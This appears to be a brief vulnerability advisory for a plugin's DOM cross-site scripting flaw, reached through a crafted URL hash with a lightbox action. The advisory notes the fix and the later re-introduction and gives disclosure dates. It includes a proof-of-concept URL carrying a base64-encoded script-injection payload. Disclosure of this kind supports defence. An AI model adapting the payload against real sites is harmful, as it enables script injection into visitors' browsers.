The plugin does not sanitise or escape user input appended to the DOM via a malicious hash, resulting in a DOM Cross-Site Scripting issue. The issue was initially fixed in 3.1.4, however re-introduced in 3.2.0.
https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9
Joel
Joel
Yes
2021-03-24 (about 2 years ago)
2021-10-20 (about 1 years ago)
2022-04-14 (about 1 years ago)